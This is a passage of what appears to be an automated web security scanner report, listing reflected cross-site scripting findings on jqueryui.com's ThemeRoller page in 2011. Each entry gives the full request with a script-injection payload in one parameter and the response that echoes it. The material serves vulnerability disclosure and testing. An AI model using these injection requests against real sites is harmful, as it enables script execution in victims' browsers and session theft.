ss.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=2121214728a"><script>alert(1)</script>e4181889fbb&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgT
...[SNIP]...

3.50. http://jqueryui.com/themeroller/ [fcContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69af0"><script>alert(1)</script>18274536c6e was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=22222269af0"><script>alert(1)</script>18274536c6e&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=22222269af0"><script>alert(1)</script>18274536c6e&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover
...[SNIP]...

3.51. http://jqueryui.com/themeroller/ [fcDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbdc8"><script>alert(1)</script>192e61c2ff2 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555dbdc8"><script>alert(1)</script>192e61c2ff2&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
pacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555dbdc8"><script>alert(1)</script>192e61c2ff2&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.
...[SNIP]...

3.52. http://jqueryui.com/themeroller/ [fcError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7fbc"><script>alert(1)</script>e518040edc1 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ac7fbc"><script>alert(1)</script>e518040edc1&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ac7fbc"><script>alert(1)</script>e518040edc1&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

3.53. http://jqueryui.com/themeroller/ [fcHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d936"><script>alert(1)</script>738d6424a3a was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=2222223d936"><script>alert(1)</script>738d6424a3a&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=2222223d936"><script>alert(1)</script>738d6424a3a&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefau
...[SNIP]...

3.54. http://jqueryui.com/themeroller/ [fcHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 803b3"><script>alert(1)</script>7c85cb6c075 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636803b3"><script>alert(1)</script>7c85cb6c075&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636803b3"><script>alert(1)</script>7c85cb6c075&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_fl
...[SNIP]...

3.55. http://jqueryui.com/themeroller/ [fcHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1068c"><script>alert(1)</script>7eef4e3fb21 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=2121211068c"><script>alert(1)</script>7eef4e3fb21&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=2121211068c"><script>alert(1)</script>7eef4e3fb21&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight
...[SNIP]...

3.56. http://jqueryui.com/themeroller/ [ffDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18ad2"><script>alert(1)</script>136246c6494 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif18ad2"><script>alert(1)</script>136246c6494&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:16:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif18ad2"><script>alert(1)</script>136246c6494&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgCol
...[SNIP]...

3.57. http://jqueryui.com/themeroller/ [fsDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4e4"><script>alert(1)</script>34d5273700b was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em3b4e4"><script>alert(1)</script>34d5273700b&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:16:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em3b4e4"><script>alert(1)</script>34d5273700b&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent
...[SNIP]...

3.58. http://jqueryui.com/themeroller/ [fwDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19ae2"><script>alert(1)</script>6922eb8ad9f was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal19ae2"><script>alert(1)</script>6922eb8ad9f&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:16:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119977

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal19ae2"><script>alert(1)</script>6922eb8ad9f&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&
...[SNIP]...

3.59. http://jqueryui.com/themeroller/ [iconColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f5f4"><script>alert(1)</script>c47e4b86f7e was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

